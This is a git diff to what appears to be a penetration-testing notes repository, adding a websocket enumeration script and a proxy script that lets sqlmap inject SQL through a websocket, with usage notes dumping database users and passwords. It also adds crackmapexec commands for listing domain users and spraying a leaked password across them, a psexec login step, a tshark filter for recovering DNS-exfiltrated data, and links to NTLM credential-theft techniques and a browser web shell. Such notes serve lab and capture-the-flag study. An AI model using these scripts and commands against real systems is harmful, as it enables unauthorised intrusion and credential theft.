diff --git a/Enumeration/EnumScripts/websocket_enumeration.py b/Enumeration/EnumScripts/websocket_enumeration.py new file mode 100644 index 0000000..cf705a2 --- /dev/null +++ b/Enumeration/EnumScripts/websocket_enumeration.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python3 + + +import sys +import json +import websocket + +URL_PATH = "" +if len(sys.argv) > 1: + URL_PATH = sys.argv[1] + if URL_PATH.startswith('/'): + URL_PATH = URL_PATH[1::] + +WEBSOCKET_URL = f"ws://example.com:5789/{URL_PATH}" + + +def on_open(web_socket): + request = { + "test": "example" + } + + if len(sys.argv) == 4: + request = { + f"{sys.argv[2]}": f"{sys.argv[3]}" + } + print(f"Sent:\n\n{json.dumps(request)}") + web_socket.send(json.dumps(request)) + + +def on_message(web_socket, message): + print(f"\nReceived:\n\n{message}") + + +websocket_client = websocket.WebSocketApp( + WEBSOCKET_URL, + on_open=on_open, + on_message=on_message + ) + +websocket_client.run_forever() diff --git a/Enumeration/SMB.md b/Enumeration/SMB.md index 4e58f56..5937bb2 100644 --- a/Enumeration/SMB.md +++ b/Enumeration/SMB.md @@ -23,3 +23,22 @@ smbclient -L //$TARGET_IP/ --option='client min protocol=NT1' ```sh smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig' ``` + +## Enumerate Domain Users + +List users of the domain through leaked credentials of an SMB user +```sh +crackmapexec smb example.com -u lowperm_user -p 'securepassword!' --users +``` + +Continue trying the found password on the users discovered in the step before +```sh +crackmapexec smb example.com -u domain_users.txt -p 'securepassword!' --continue-on-success +``` + +## Enumerate Writeable SMB shares + +List writeable SMB shares for found domain users via impacket's psexec +```sh +psexec.py example.com/domain.user@example.com +``` diff --git a/Exploits/Databases/Scripts/sqlmap_websocket_server.py b/Exploits/Databases/Scripts/sqlmap_websocket_server.py new file mode 100644 index 0000000..8dafeff --- /dev/null +++ b/Exploits/Databases/Scripts/sqlmap_websocket_server.py @@ -0,0 +1,62 @@ +#!/usr/bin/env python3 + +import sys +from http.server import SimpleHTTPRequestHandler +from socketserver import TCPServer +from urllib.parse import unquote, urlparse +from websocket import create_connection + +URL_PATH = "" +if len(sys.argv) > 1: + URL_PATH = sys.argv[1] + if URL_PATH.startswith('/'): + URL_PATH = URL_PATH[1::] + +WS_SERVER = f"ws://example.com:5789/{URL_PATH}" + + +def send_ws(payload): + ws = create_connection(WS_SERVER) + # res = ws.recv() + message = unquote(payload).replace('"', '\\"') + data = '{"version": "' + message + '"}' + + ws.send(data) + res = ws.recv() + ws.close() + + if res: + return res + return 0 + + +def middleware_server(host_port, content_type="text/plain"): + + class CustomHandler(SimpleHTTPRequestHandler): + def do_GET(self) -> None: + self.send_response(200) + try: + payload = urlparse(self.path).query.split('=', 1)[1] + except IndexError: + payload = False + if payload: + content = send_ws(payload) + else: + content = "No payload specified" + self.send_header("Content-Type", content_type) + self.end_headers() + self.wfile.write(content.encode()) + + class _TCPServer(TCPServer): + allow_reuse_address = True + + httpd = _TCPServer(host_port, CustomHandler) + httpd.serve_forever() + + +print(f"Payload is sent to {WS_SERVER} via http://localhost:8081/?id=*") + +try: + middleware_server(('0.0.0.0', 8081)) +except KeyboardInterrupt: + pass diff --git a/Exploits/Databases/Websocket SQLi.md b/Exploits/Databases/Websocket SQLi.md index c81cb6f..94c637e 100644 --- a/Exploits/Databases/Websocket SQLi.md +++ b/Exploits/Databases/Websocket SQLi.md @@ -6,6 +6,26 @@ sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs ``` +## Usage + +First, make sure ` websocket-client` is installed from PyPi. + +Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts). +You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way +```sh +websocket_enumeration.py /values key value +``` + +I modified the script rayhan0x01 provides so that an endpoint can set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way +```sh +sqlmap_websocket_server.py /endpoint +``` + +Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081 +```sh +sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users +``` + ## References * [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli) diff --git a/Exploits/References.md b/Exploits/References.md index 78a072a..0e14db4 100644 --- a/Exploits/References.md +++ b/Exploits/References.md @@ -62,6 +62,7 @@ [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) [nishang](https://github.com/samratashok/nishang.git) +[hacktricks' Places to steal ntlm creds](https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds) # Exploits diff --git a/Forensics/Wireshark.md b/Forensics/Wireshark.md index 53bca98..0abdb50 100644 --- a/Forensics/Wireshark.md +++ b/Forensics/Wireshark.md @@ -12,3 +12,9 @@ tshark -r keystrokes.pcapng -Y "usb.transfer_type==0x01 and frame.len==35 and! ( python keystrokedecoder.py output.txt ``` +## Extracting Payload sent in DNS Request + +Search for the DNS requests containing the specific top level domain. +```sh +tshark -r capture.pcapng -Y 'dns && ip.dst==167.71.211.113 && (dns contains xyz)' -T fields -e dns.qry.name | awk -F '.' '{print $1}' | uniq > dns.out +``` diff --git a/Reverse Shells/References.md b/Reverse Shells/References.md index 465fbed..8351ae5 100644 --- a/Reverse Shells/References.md +++ b/Reverse Shells/References.md @@ -17,3 +17,7 @@ [pentestmonkey's Reverse Shell Chea Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) [Arr0way's Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) + +## Pw0nyShell + +Commandline Shell Inside the Browser Window is [flozz's p0wny shell](https://github.com/flozz/p0wny-shell.git)